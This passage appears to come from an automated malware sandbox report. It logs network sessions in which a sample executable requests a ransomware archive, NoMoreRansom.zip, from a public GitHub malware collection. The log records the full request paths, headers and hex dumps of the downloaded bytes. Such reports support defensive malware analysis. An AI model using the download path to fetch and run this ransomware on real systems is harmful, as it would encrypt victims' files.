                                                                                                        2022-09-29 12:45:15 UTC1177INData Raw: 5b 84 4f b9 5f 7f 21 0b aa 48 14 92 9f ee a9 a2 68 03 bf 5f 63 56 80 84 93 86 87 43 cc 56 2b 83 88 a1 8f f4 8e fb 24 12 8c 0e 29 e1 a6 45 89 ae bc 40 8a a8 12 b0 a1 81 e1 2b c9 7d b9 3a 10 85 d2 c8 50 81 71 e3 41 5a 78 e6 f1 6f 28 ca ce f5 fc 26 91 ae 88 1a a2 91 bb 4b ac 72 f6 f6 1d ea 4d 71 c8 31 91 63 ba 34 db 2d a3 46 d8 b6 5f ac 43 71 ef cb 5b 5d bf a6 5d 15 db a0 98 6b 68 93 c4 15 10 66 fb 40 e1 31 1a ad 53 6a 71 f9 91 64 18 90 db 92 bf 6e 0a f0 b6 a8 55 c3 aa 59 0d f6 0b ce f4 ff 47 21 73 43 df 0a 14 b6 d6 ea cb c4 b3 46 76 59 0c 31 f4 82 e4 70 04 d7 b6 b0 28 de 16 03 2f 47 51 98 35 16 d7 2a ea 83 88 c6 81 f2 ca 8d ff 03 e6 9d dd be f1 3b 5a d7 3f e4 28 7f d3 fd 10 0e de ee ce fc d6 f9 af 35 66 c8 63 ce 34 2d 1e 63 dd 1f 70 22 a1 78 f0 a8 77 e6 74
                                                                                                        Data Ascii: [O_!Hh_cVCV+$)E@+}:PqAZxo(&KrMq1c4-F_Cq[]]khf@1SjqdnUYG!sCFvY1p(/GQ5*;Z?(5fc4-cp"xwt
                                                                                                        2022-09-29 12:45:15 UTC1178INData Raw: 69 06 43 75 c0 71 a4 bd cd eb cd f5 d7 d0 aa 7e 02 b4 bd ff a9 c1 e0 71 bb 06 ec 1a 5e fa 01 7e 5d 9c d5 ee 25 90 c8 0a f8 f7 5c f5 99 34 c0 e3 ba 5a ff 24 0d c6 be b5 4d 36 ec fd a4 c3 6d 94 6e 7c 43 0e 2d 61 a7 70 21 61 80 bc 33 3e 0e a6 14 ee c9 7d 06 d4 be 19 c6 3b 76 a0 3a e5 ed 0b 8e 5a 1c 0d 21 78 be ce b8 e4 85 bd 13 09 05 bf 9b 89 e5 9c c2 2d fd f3 bf 7a 70 10 57 fd 4d d8 48 ce fb 92 10 67 04 1e e8 08 c7 95 a5 5e e5 4b 55 61 f7 1a aa d1 40 e5 ef d5 b8 f0 3d 1b b3 14 7e 86 29 d9 d8 72 5d 09 5e 96 8f e1 c9 21 ed 50 e4 e1 db 86 27 4c b9 54 b5 8b e5 77 9f 12 5b 8d cc 83 4e 6c bf f9 10 a0 10 97 be e3 d9 39 b1 08 31 d8 b6 f7 8c ce f2 24 65 a1 12 5f 03 a7 0d e5 15 ce af 6c b1 ee e3 68 63 e4 58 c7 30 d2 4c 66 0a c8 dc da d0 e8 84 ac f6 cf af 62 77 b6 24
                                                                                                        Data Ascii: iCuq~q^~]%\4Z$M6mn|C-ap!a3>};v:Z!x-zpWMHg^KUa@=~)r]^!P'LTw[Nl91$e_lhcX0Lfbw$


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        14192.168.2.449736140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:45:18 UTC1179OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/NoMoreRansom.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:45:18 UTC1179INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:44:54 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:45:18 UTC1180INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        15192.168.2.449737185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:45:18 UTC1182OUTGET /Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip HTTP/1.1
                                                                                                        Host: raw.githubusercontent.com
                                                                                                        2022-09-29 12:45:18 UTC1182INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 938498
                                                                                                        Cache-Control: max-age=300
                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                        Content-Type: application/zip
                                                                                                        ETag: "a8e6304ff5320ec60c4e2f8e3ebb31e42a5adf4691dfa4eaa6f24b4dad08bbfd"
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-Frame-Options: deny
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        X-GitHub-Request-Id: D4EA:67BC:3D674:FA8B9:63359346
                                                                                                        Accept-Ranges: bytes
                                                                                                        Date: Thu, 29 Sep 2022 12:45:18 GMT
                                                                                                        Via: 1.1 varnish
                                                                                                        X-Served-By: cache-mxp6949-MXP
                                                                                                        X-Cache: HIT
                                                                                                        X-Cache-Hits: 1
                                                                                                        X-Timer: S1664455518.273125,VS0,VE2
                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        X-Fastly-Request-ID: 013d4c33fd8f2c9b114172705eee47c4ffd9bf5a
                                                                                                        Expires: Thu, 29 Sep 2022 12:50:18 GMT
                                                                                                        Source-Age: 24
                                                                                                        2022-09-29 12:45:18 UTC1183INData Raw: 50 4b 03 04 14 00 01 00 08 00 98 82 ba 4a dc 69 b2 15 46 51 0e 00 00 ca 15 00 1b 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 4e 6f 4d 6f 72 65 52 61 6e 73 6f 6d 2e 65 78 65 b5 26 50 b8 1f d7 f7 5c 00 a2 4a af d9 76 74 a7 44 28 27 ef 18 69 bb ab c2 21 d8 7d 8d cf 83 56 8f 2f be 64 10 fd 69 17 eb d0 5e f2 d1 6a a5 9a e0 56 c4 b3 e4 ff ef a6 06 ea d6 bb 64 6b 3f ea f9 6f 23 d2 9f e5 e4 cd 7d d2 36 bb 46 c8 f4 08 1a 00 0f 17 49 5a 2b cf 96 7e c2 48 0e 6c 80 6f ea ba 11 a3 fc ab 7a 93 b5 f5 72 91 10 54 4a a5 5e c7 31 ec 37 cb 13 62 26 42 d9 40 f7 43 ab dd a9 a1 a0 e4 29 c6 f9 df 33 34 5d 1a c8 97 96 7e cd dd d4 6d d2 f7 59 b8 fe 1d 7d fb 12 f3 50 a2 72 b6 cf dc 3e fb 7a ff 18 09 a8 c1 22 05 34 54 9a 3e dc 1b c6 15 06 cb f9 a0 a0 5c 0d b6 3f e9 b8 c9 45 cc d1 03
                                                                                                        Data Ascii: PKJiFQEndermanch@NoMoreRansom.exe&P\JvtD('i!}V/di^jVdk?o#}6FIZ+~HlozrTJ^17b&B@C)34]~mY}Pr>z"4T>\?E
                                                                                                        2022-09-29 12:45:18 UTC1199INData Raw: bf 27 6a 4b fc d7 89 89 ce 09 d4 51 ba 84 52 41 e3 94 26 5a ae 34 2e 26 f5 ce 87 ef 46 f6 9d f1 d0 d3 2a 01 e6 5c 17 5c 62 af 20 3b 7d 81 1c ea 31 24 f2 6a 7b cf 00 ce 56 e9 89 90 e3 e6 83 b8 dc 24 6d 02 56 15 70 b9 92 99 e8 87 af b5 5d a0 6a 0f 2e 9f 59 5d fe 06 59 68 a3 5d 6d 2b 20 81 3d 44 d9 3f f3 9f fb e7 76 65 b1 8b 43 3e 73 30 68 b4 40 2d 2b 35 40 b4 ce 3c d0 84 0d 22 04 30 50 4a 87 a9 53 57 89 9c 5a 82 96 cd 4a 23 54 8d 8e 15 72 5e 65 1c 04 6d aa 1a 99 e8 3a 0a 44 21 08 73 ed b8 0c b6 9a 00 4c 1c 5b fd cd 13 5e 62 49 41 41 81 40 5e ef 9c 1c 0c c2 59 5c da 16 6c 33 37 ff d2 b2 b3 70 02 f2 34 a3 67 c8 6d 91 88 e7 17 76 bd 95 50 08 39 d0 81 a2 97 2c 9c a5 2a 98 6c 38 44 af 76 eb 62 fe f6 95 a6 f0 65 7e 50 7b 7e 58 a6 50 7b f9 dc 15 ce 89 33 8c 9b 40
                                                                                                        Data Ascii: 'jKQRA&Z4.&F*\\b ;}1$j{V$mVp]j.Y]Yh]m+ =D?veC>s0h@-+5@<"0PJSWZJ#Tr^em:D!sL[^bIAA@^Y\l37p4gmvP9,*l8Dvbe~P{~XP{3@
                                                                                                        2022-09-29 12:45:18 UTC1215INData Raw: e3 30 9c f5 6d 4b f0 ef 9d 4c 7a 76 cd 99 78 da f2 da 21 b9 d6 83 dc 4c 21 6e 4f 4c 2a dd e7 da 5d 26 81 fc c0 b1 3b 54 f7 b7 28 9f 5e 04 1a 54 b5 8e ca a1 4c ea e8 c5 74 74 3b 89 93 42 83 71 be 98 d2 9f a6 b4 f7 84 8b da a0 e5 b1 c1 66 60 91 48 02 f2 01 02 76 bf c2 bd 4a 57 56 83 b3 83 33 cc 7d ff 84 b6 b5 44 4a 6e f8 f7 2a f6 ae 83 06 86 4c 51 64 7f ae a3 a2 ca 86 db aa 86 62 78 57 21 e6 dd b6 70 48 e5 f9 6f c7 a1 27 44 05 14 f2 6f a2 4d 4e 46 93 d0 2f 82 46 11 ba 7d 07 a5 d4 50 39 64 25 a3 94 8b 06 79 93 3a c7 2d c0 02 e0 10 1c 68 0c a7 a4 bb 94 cd 65 ed 47 6c 18 a1 a5 c1 13 2b 88 a0 ab d1 d1 5a 3b 24 c9 74 d4 87 0f 8c 5b 1b 5f 37 ef 3f 71 6d a9 7a f7 1f ba 9e 89 ed 4f d7 f9 0c 6c 15 a7 d0 11 a1 d9 32 85 20 32 aa cd 1e b6 6d a5 f3 1b 9c 4d e8 c7 8c b4
                                                                                                        Data Ascii: 0mKLzvx!L!nOL*]&;T(^TLtt;Bqf`HvJWV3}DJn*LQdbxW!pHo'DoMNF/F}P9d%y:-heGl+Z;$t[_7?qmzOl2 2mM
                                                                                                        2022-09-29 12:45:18 UTC1231INData Raw: e4 88 41 05 9c 28 5b be d6 df b4 92 9b b0 71 b3 8f 22 27 08 16 70 70 67 40 52 e1 95 47 ef 7d d4 59 6a 93 78 c3 81 98 ca e2 34 6c 21 37 e0 6c 36 a6 2d d2 34 6d 06 0b 56 f2 77 34 c3 24 80 06 f3 1f 36 5a 73 69 94 45 82 13 be fc 32 59 86 98 71 fc a2 62 04 6a b8 52 e4 d0 91 06 56 1c 55 fa ee e8 a8 ff 08 79 b0 f8 e4 ad 0f a0 4a fd 6e 5a 9b 0e 7d 51 dc 58 7a 4e 41 d4 87 05 2c fe a5 06 76 7a d5 7c ae 02 e0 a2 0b df 88 3a 8f 6e 38 bc 43 22 60 e7 a8 2d ec a4 91 8e f5 94 a4 91 29 fa 25 cb 96 a9 58 32 18 8c f3 f8 64 7d f7 32 c0 68 e1 15 e3 77 9d b4 f1 f6 b2 22 dd fd 9f 7f ac 40 b7 d4 c2 4f 47 83 47 8d 79 28 92 d1 b3 74 3c a2 cf ff db 90 a9 06 fd cc 2a d1 b7 86 e3 20 23 81 46 0f 17 82 f4 ae ee 8f 37 e7 6f 93 89 d6 fb 32 ed c4 02 8e b2 10 33 c5 e2 54 9e fd db 85 a8 ba
                                                                                                        Data Ascii: A([q"'ppg@RG}Yjx4l!7l6-4mVw4$6ZsiE2YqbjRVUyJnZ}QXzNA,vz|:n8C"`-)%X2d}2hw"@OGGy(t<* #F7o23T
                                                                                                        2022-09-29 12:45:18 UTC1247INData Raw: e8 a7 4a e3 dd 57 95 09 39 92 c1 7d 2e 12 d1 eb 3b 35 9b fb 1c cf 38 5e 7f 35 31 93 0a 6f d3 fc a1 f7 74 1b 8c e0 3a 6d 75 39 f8 b8 0b 5e 72 91 24 ad 3c af 6a 04 b7 6b 24 f5 21 79 84 21 ad 23 01 4c 7a cf 41 bd 4d af a7 19 d9 7a ee 0d 3d 09 82 b4 45 74 88 20 28 d4 de 94 f4 44 21 d5 6e 5b fe 97 dc ce 02 76 da e8 64 be a7 72 ce 6b 17 6f 28 c6 19 66 d3 f6 a3 0e d2 0b 99 2b 9e a0 5e ae 32 58 cb 51 73 f3 03 8e 8e db c5 67 a8 2f b5 ef 05 b3 90 62 e6 51 3d 06 6f da ce 98 2f 0b 84 6d df c3 19 26 6e a6 3d 74 20 31 3a 86 b3 b7 14 d4 99 f1 10 51 81 16 29 aa 8f e5 02 35 0b 9f bd d1 43 99 0d d4 c2 4c f6 ed 5c 13 73 cd 3b 9b b0 ee 9b fa 5a 40 7e bb 0e 06 49 c0 a0 b8 f1 56 c2 f3 0f fc 08 c0 bc 40 ad 72 7b 8f 9a df 2a ab 9e 13 a4 ef 29 1d 65 ca f5 33 56 ad 6a fd 25 7a 4a
                                                                                                        Data Ascii: JW9}.;58^51ot:mu9^r$<jk$!y!#LzAMz=Et (D!n[vdrko(f+^2XQsg/bQ=o/m&n=t 1:Q)5CL\s;Z@~IV@r{*)e3Vj%zJ
                                                                                                        2022-09-29 12:45:18 UTC1263INData Raw: 6e 27 32 15 0a 3e b6 1e af 70 81 fe 52 e6 d8 17 0b 46 e7 4c f9 f6 a8 4c 60 34 d9 56 6a 29 72 c4 bb 02 33 d9 9b fa 99 89 19 27 e4 3f 3a 2e 81 19 47 78 a5 e0 7b 88 b9 8b 90 50 78 6f 6f 59 c2 25 50 78 7e c5 82 c6 c5 60 48 94 31 4a fd 10 bf 6a fe 70 30 99 14 a7 c7 9c 09 6f 93 69 9b 3e 36 a1 d5 36 f0 f2 af 07 30 b8 f2 95 8f fc c1 59 97 ab 14 5f ab 32 a2 40 8b 58 44 a5 c9 31 c7 c7 d8 79 b4 b9 3f 25 2f 18 5a c0 a2 69 c5 b0 40 c0 f5 63 0c 03 01 2a 0f 46 5d eb 07 e1 61 40 7d b4 28 cf 73 23 9d a8 86 83 86 94 2c 0f 03 f0 19 15 06 0a 2c 61 d7 b5 ff 79 9e 39 a1 b0 97 9a 5c 2b 2a 62 de 9a da bb b5 a9 9b 5b aa fa ba 2f 4c 33 67 f3 32 1d ef e3 d2 1f 7a 26 52 be 72 4f c4 44 84 74 63 09 f5 7d d7 a0 4d 1f 77 1d 70 c2 17 ce 54 7d 94 4e 0f 7d 68 05 8b e3 fd 4d 23 a0 36 6f ef
                                                                                                        Data Ascii: n'2>pRFLL`4Vj)r3'?:.Gx{PxooY%Px~`H1Jjp0oi>660Y_2@XD1y?%/Zi@c*F]a@}(s#,,ay9\+*b[/L3g2z&RrODtc}MwpT}N}hM#6o
                                                                                                        2022-09-29 12:45:18 UTC1279INData Raw: d3 21 61 ec 0d 9f 21 5e 18 28 ef a1 80 34 78 c6 56 e8 88 92 bc 8d 83 18 80 3f 69 5c 11 a4 ea f3 41 90 db 0a e8 e4 48 38 99 62 27 24 51 81 41 f0 38 64 c0 00 1c e5 de e5 76 cd ce d3 4f 8e d7 f2 ab 2c 66 7f 19 a5 0e 88 43 b6 ff d2 db 6f 1a 24 7e 58 02 93 66 c1 3c 4a 06 a7 35 ce 2d af ea 83 ad 1a 7a e5 fc 98 6b 2c f2 ba 58 f1 a5 0d 6b 4e 1f ec 6e 16 ea 51 4f ef 49 f9 1e 3a ef 22 b5 5b de 59 73 52 8e b1 3c bb 76 71 ee 94 82 de 7b 24 ce 1b ac 1b 87 16 a7 0a e2 99 c1 77 f2 cd f8 75 66 fd 71 3b 6c c9 b2 aa 93 f9 17 3b dd ae 7e c5 de fd c8 61 a6 c2 50 7f 2c 51 80 62 ce bb b0 d8 3e de 39 20 dc 5e 74 c0 77 7f be ea db df 71 2d b1 a7 00 9f 3f c4 ac 08 27 04 cc d3 90 41 2a a4 3b 0e 43 b4 21 9a 1b 18 b0 6d 0a 10 30 82 3b 12 06 ca c7 ba e7 e4 cd 34 ce ad 9b 17 80 d1 f8
                                                                                                        Data Ascii: !a!^(4xV?i\AH8b'$QA8dvO,fCo$~Xf<J5-zk,XkNnQOI:"[YsR<vq{$wufq;l;~aP,Qb>9 ^twq-?'A*;C!m0;4
                                                                                                        2022-09-29 12:45:18 UTC1295INData Raw: 63 a5 ce 62 52 9d b1 b4 e3 8d d6 36 b3 6e da 2b 7c a4 2d 62 bd 42 71 52 a5 1b 11 7f 65 43 45 8d 97 75 e1 eb d9 5a b4 04 27 cf 06 9f 4b ed e6 fb df cc d0 aa fc 63 21 6c ce 20 bc 5e c7 b1 86 01 37 70 95 d0 df 24 8f cd 3f 2f e4 33 e2 56 15 f9 31 96 9f d5 60 12 24 43 fe 6c 4f 32 8d 82 98 64 af 5b 99 86 04 fa e3 d3 49 bc c2 80 b0 6f ae 9a d1 31 2d 38 0a 0a 04 d5 c0 9a b9 b0 5f 8b 8d 15 be e3 1d d5 57 0c 17 d1 2e 22 4b 37 74 91 f6 27 94 bf b6 73 60 67 ea f2 66 01 90 7b cd 89 75 99 4a 59 69 06 c4 93 d6 87 74 f3 05 dc df 76 08 04 1a 16 4b 4c c8 f9 ac 79 b5 4d 11 da 03 2d 56 17 e7 d7 e0 e4 0e 71 22 b1 f8 2c 06 ab f6 5b ba 74 06 29 d9 61 5f 60 2f f5 0f fc 46 63 5f 29 f4 b4 9f 88 06 d6 db 42 25 3a df 90 4e 6a e8 39 a9 81 34 96 e5 48 b4 14 d4 e2 f5 3d 2b f3 06 95 8c
                                                                                                        Data Ascii: cbR6n+|-bBqReCEuZ'Kc!l ^7p$?/3V1`$ClO2d[Io1-8_W."K7t's`gf{uJYitvKLyM-Vq",[t)a_`/Fc_)B%:Nj94H=+
                                                                                                        2022-09-29 12:45:18 UTC1311INData Raw: 20 6f 74 d0 1b 48 f2 77 95 d5 81 fc dc e6 a8 68 69 1b a2 ec ea eb c0 eb 22 ee 0c 47 28 aa da a9 78 7b 18 e4 48 10 26 c2 49 5d 7d 60 ae 10 f1 70 48 79 1c 7a 29 44 00 a5 a5 8c f6 fd af 2e 52 c2 ed 7f 96 2f 49 27 c2 2b 0f f3 c1 2f 14 4d 7d 1b 9c cc e1 b0 50 5c ca f4 fc e0 3e a6 a9 e9 ef 4b 5c b9 2d 53 42 d5 5d 12 77 37 0c 6b ca c7 7a 03 1d b7 f6 5a 47 89 38 aa 77 b7 ff 03 f9 3a 8f 9d b1 66 03 65 b7 fa 53 97 cd 2e d9 9a c8 05 1f 8a f7 27 df 24 cc 70 38 1e c5 41 7d aa 7b b3 95 90 7a f5 a2 09 45 58 2a 30 83 e0 07 91 43 81 27 92 70 61 4a 66 1b ce 37 7c df 14 74 03 61 f9 d0 a0 39 32 7c 51 f5 2f 3d ea 46 a9 50 b8 78 1b d3 08 eb dc dd 80 d9 48 45 9c 9f d0 d0 22 29 be bc 83 33 0e ff f4 3e 14 82 00 78 b5 15 13 4f ad 83 e2 15 82 a3 15 56 c6 09 cd 18 12 6c 9a 6d 1f 2a
                                                                                                        Data Ascii: otHwhi"G(x{H&I]}`pHyz)D.R/I'+/M}P\>K\-SB]w7kzZG8w:feS.'$p8A}{zEX*0C'paJf7|ta92|Q/=FPxHE")3>xOVlm*
                                                                                                        2022-09-29 12:45:18 UTC1327INData Raw: 40 c3 c0 3e cb c8 82 54 57 b5 92 15 a2 11 9c 18 e4 9f fa 98 10 14 b1 6d d0 70 b7 f8 e8 7c 6f 65 7a 7c a1 c4 af 0f c4 2a 5d 5d c8 e9 90 58 d4 ff c4 b2 ee 53 37 5e 1d c3 d0 03 6a 9b 77 bf b5 95 b8 ec e6 c5 2b 9a 0f f3 0c c8 5f 35 82 27 48 f3 60 ac 1e 4c a7 d9 1f 1d 49 81 b0 33 77 07 9c 4b c5 c2 e9 a7 da 02 b2 ee 0c 8b c0 42 d5 c3 61 cc e1 26 05 8f c4 ca cc d5 29 1c 73 dd fa 40 52 b0 5e fe 73 66 c9 f5 ef 2a 48 c7 7a 83 65 30 3a ee 77 e9 c9 0f 72 fd a8 2c 0b 72 c9 48 08 16 30 1d 70 57 14 15 25 3d fc 2a ac 4d 85 e4 82 e1 3b 64 48 5b a0 69 da 44 6e c6 33 e0 e3 01 73 5d b0 38 04 d3 15 69 fe d8 c1 69 8d f4 c2 9e 5c 72 e6 7c d8 01 63 14 3f 69 b9 0e aa f6 81 12 79 00 f8 d9 06 32 27 10 fb fb bc 5b 9f 02 af ad d4 ef 5c a3 db 55 5a 16 e8 ee 0c 18 f1 58 f8 73 d8 75 a6
                                                                                                        Data Ascii: @>TWmp|oez|*]]XS7^jw+_5'H`LI3wKBa&)s@R^sf*Hze0:wr,rH0pW%=*M;dH[iDn3s]8ii\r|c?iy2'[\UZXsu
                                                                                                        2022-09-29 12:45:18 UTC1343INData Raw: d3 80 98 a8 0f 12 ac 63 1d 65 17 57 77 7f 4d 93 03 79 e0 41 c3 cf b5 94 44 59 3a 2a d1 c5 e1 50 cc fe 66 e3 f2 ff 3b 6a e2 92 35 8f 54 b3 16 e9 07 8b 3f 1b b8 83 6b bc 33 f4 06 52 0c ab 51 b6 a3 49 65 7e cd 78 d3 4a d9 eb a5 b4 10 17 ab 36 f8 ce a1 a8 3d 12 a1 a4 7b 31 ad 40 83 2d c4 3b 73 ea af ee d4 2c a3 27 33 8c d4 99 5f d4 d4 dc 23 4c c9 d8 69 a6 41 a2 3a 8e ce 9c d1 8a 09 37 78 19 99 f3 18 ec 73 26 9a 11 38 9f 4d 48 9f ce 52 2a b1 bd 1b e3 e2 17 77 76 1d 0f 87 d9 c2 2c dd 50 f5 3a 00 7c 60 12 97 cc a3 ff ee 23 d2 96 fe 94 df 08 67 32 10 a6 5f 9d 94 d6 b6 05 87 2f 9b c7 ee 03 34 60 65 16 e2 95 72 69 18 d4 3e 94 84 c2 c2 a8 1a 18 48 4b 54 fd 10 c5 6e 9f 97 3f b3 36 1c 7e a6 04 ac 9c 10 31 f5 7c 97 da ef ac 30 cf c9 de 3a d4 25 16 a3 ee 97 10 78 ca 1d
                                                                                                        Data Ascii: ceWwMyADY:*Pf;j5T?k3RQIe~xJ6={1@-;s,'3_#LiA:7xs&8MHR*wv,P:|`#g2_/4`eri>HKTn?6~1|0:%x
                                                                                                        2022-09-29 12:45:18 UTC1359INData Raw: 3c 05 f8 ad 1a f3 4d fe d0 0a c9 dc 0b 9c a1 07 25 74 4b ec 2c 5e 54 77 d3 77 dc d6 dc 28 4e 53 92 cd c6 07 c7 43 92 0b 62 f6 34 8a 01 7f 83 f3 f8 75 57 17 0c b8 34 38 0f c4 a2 71 cf b9 f3 73 85 91 f9 15 39 15 1b fe 7e c8 ed ff 00 74 72 e5 40 cf d2 39 aa fa 6b 33 72 ad a3 61 9f ee 5c 97 6b 9f 15 ac 1f 93 d3 b6 52 21 ec 09 67 3f dd 23 00 ed 61 ee 9d 95 d7 ce ad 86 7d de e3 df f9 5f 80 ee e8 0f c7 e3 14 51 77 6f 23 e1 d6 80 92 8d 2a 60 3b dd 6e e5 5a c1 53 94 ee 65 c8 ca 3b da 02 87 86 1c 53 1c d8 fc 27 3c 4c 7b 72 06 c5 b3 47 90 e2 0b bc ab 1d 4e a8 62 b0 ec 13 89 27 4c a8 8a 0c 9e 5c 40 06 aa 8f 5b 64 90 2a fa bb 3b df b9 4d d0 93 38 31 e7 54 30 3f a8 b5 8c 6f 7b 40 d3 7e 4c 80 30 94 eb 73 36 95 42 d3 97 96 fb 86 0e 2c 03 1e c1 77 33 29 cf 43 c2 a8 0a 7c
                                                                                                        Data Ascii: <M%tK,^Tww(NSCb4uW48qs9~tr@9k3ra\kR!g?#a}_Qwo#*`;nZSe;S'<L{rGNb'L\@[d*;M81T0?o{@~L0s6B,w3)C|
                                                                                                        2022-09-29 12:45:18 UTC1375INData Raw: 8a 8d 55 a6 49 8e 09 a8 c8 b2 20 ac 0c cc 0c 80 44 34 12 96 38 78 f7 c3 55 28 a6 f5 55 2f fa 70 51 a5 f8 8f 80 d4 1c 86 87 5b d0 38 d3 1d 20 dd 9b b5 55 71 2e ff 35 3d 45 71 c7 c1 f7 fe 18 8a 99 7b 21 e5 4e 31 31 de f5 74 1e 64 6a c2 3b 7b 45 df be 96 b9 26 69 1b 17 e9 77 be c6 40 0f b9 c3 b1 86 84 2b 8b 1f 71 56 55 c6 53 6e 30 54 0c 62 8a 32 82 7d 15 93 5a 42 2f 1c 6c a6 eb 07 11 9a b1 fe 7b 90 c2 65 24 a3 77 70 0a 32 bf 24 4a 4e 0b c0 f6 5c 0f 0f 15 16 b3 cf 7d 8c 16 a5 44 2b ea 58 b1 81 ca 8e de c3 70 3f 27 34 9a 45 36 04 13 5a 90 c1 ee 33 a0 cc cc b9 16 4b 84 44 90 70 76 6a 44 c8 4a ec 17 d8 e1 4b d9 2c 2b b7 8b 24 a5 35 ac f6 59 bf 5c 11 be 0f 9e 23 e8 4c b9 ad d2 32 2c 85 2f 95 db 41 15 a5 d9 c3 b4 10 89 4f 61 c2 83 9f 90 b7 7e cf 8e 29 e5 7d 8d f8
                                                                                                        Data Ascii: UI D48xU(U/pQ[8 Uq.5=Eq{!N11tdj;{E&iw@+qVUSn0Tb2}ZB/l{e$wp2$JN\}D+Xp?'4E6Z3KDpvjDJK,+$5Y\#L2,/AOa~)}
                                                                                                        2022-09-29 12:45:18 UTC1391INData Raw: 9b f8 7e 20 3b 13 4d 0f 6a 14 ed 4e ab 38 70 b2 1b d6 21 3e 49 d5 aa 52 34 f5 38 87 5d 55 90 6e 24 56 cd 08 67 04 1d 3f 86 17 a3 13 36 2c 33 33 ad 17 cb 24 97 81 60 a0 55 ae b5 d4 ee 36 c0 3e 2e 6a 7a 6b be 98 31 85 f8 be cb 5e f1 8c 29 9c f0 ba f5 3b 9a 44 90 70 76 4a bf 31 d5 bd 5e d2 a3 87 f5 9c 05 37 3f 0a 3d 11 dd ea 7b de a8 5f 46 4f 5c 64 8e 2b 00 a9 37 36 9d 20 3c 2b 11 bf 6b d4 04 ab 75 e0 af 06 1e 44 68 56 43 7c ac 34 e5 19 1c 78 6e ed 52 be ac 16 4d 08 43 8f 1c b8 fa 19 eb e3 fe 12 56 5d a9 c0 bf f1 95 93 1f 72 ae 7e 2f 78 da 5a 03 26 59 4e f3 36 2c 4d e0 c9 67 2d 0a 03 6c d9 48 46 50 42 91 2c 98 bf 62 f5 76 6b d3 1d 97 63 be ba c3 97 22 85 e8 a6 72 ea 98 db 0c 4e 84 94 c6 93 0f 64 b3 06 ba 23 d8 90 da 36 33 3e 7b dc ea 20 e2 e0 0d cc 31 71 e5
                                                                                                        Data Ascii: ~ ;MjN8p!>IR48]Un$Vg?6,33$`U6>.jzk1^);DpvJ1^7?={_FO\d+76 <+kuDhVC|4xnRMCV]r~/xZ&YN6,Mg-lHFPB,bvkc"rNd#63>{ 1q
